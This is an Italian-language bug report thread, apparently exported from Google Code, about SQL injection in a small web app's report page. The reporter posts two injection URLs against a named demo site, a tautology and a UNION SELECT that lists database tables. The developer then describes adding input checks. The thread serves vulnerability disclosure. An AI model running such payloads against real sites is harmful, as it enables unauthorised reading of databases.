Open GoogleCodeExporter opened 8 years ago
Esempio:
http://www.gestiolus.altervista.org/demo/report.php?id=17'%20OR%20id%3C%3E%20'1
Original comment by ximarx@gmail.com
on 7 Nov 2012 at 6:01
http://www.gestiolus.altervista.org/demo/report.php?id=17'%20UNION%20SELECT%20NU
LL,table_name,%20table_schema,%20NULL,%20NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20
INFORMATION_SCHEMA.TABLES%20UNION%20SELECT%20*%20FROM%20guasti%20WHERE%20stato%2
0=%20'1'%20AND%20risolutore%20=%20'1
Original comment by ximarx@gmail.com
on 7 Nov 2012 at 6:23
bhe, lo so :)
è pensato per uso interno in cui nessuno dovrebbe tentare queste cose,
altrimenti potrebbe cancellare direttamente gli utenti e i laboratori
dall'apposito pannello senza scomodare le injection :)
Original comment by carlo.mi...@gmail.com
on 7 Nov 2012 at 6:39
Il problema non è relativo solo al database del gestionale. Tramite una
installazione della webapp è possibile ottenere tutte le informazioni
disponibili sul database (che potrebbe essere condiviso da più applicazioni).
Dovreste avvisare i vostri potenziali utenti che questa webapp è di fatto un
rischio per qualsiasi altra cosa ospitata sullo stesso environment o database
Original comment by ximarx@gmail.com
on 7 Nov 2012 at 6:42
certo, capisco benissimo le problematiche che mi hai fatto notare, e mi erano
venute in mente anche a me, cosa credi? :)
però essendo una webapp che uso io e altre 3 persone, non ho ritenuto
necessario pensare alle contromisure
è la versione 0.2, ancora c'è tempo per correre ai ripari :)
Original comment by carlo.mi...@gmail.com
on 7 Nov 2012 at 10:15
alla fine l'ho risolto
ho fatto in modo che faccia un controllo nei campi
se hai voglia di provare altri escamotage (che a quanto pare io non conosco),
sarei ben lieto poi di risolverli :)
Original comment by carlo.mi...@gmail.com
on 9 Nov 2012 at 11:27
Original issue reported on code.google.com by
ximarx@gmail.com
on 7 Nov 2012 at 5:35